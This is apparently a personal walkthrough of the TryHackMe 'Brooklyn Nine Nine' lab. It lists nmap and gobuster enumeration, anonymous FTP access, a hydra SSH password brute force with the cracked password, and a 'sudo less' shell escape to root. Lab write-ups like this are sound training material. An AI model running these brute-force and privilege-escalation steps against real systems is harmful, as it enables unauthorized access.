Brooklyn Nine Nine

Room Link: https://tryhackme.com/room/brooklynninenine

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/21 - FTP

anonymous login worked

Kali

ftp $VICTIM
Username: anonymous

TCP/22 - SSH

Kali

hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://$VICTIM

Kali

ssh jake@$VICTIM
Password: 987654321

Privlege Escalation

Victim

sudo less /etc/profile
!/bin/sh

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

I tried to see if I could get any more info from the image but I never did.

Kali

exiftool brooklyn99.jpg 
steghide info brooklyn99.jpg

PrevioussourceNextAnthem

Last updated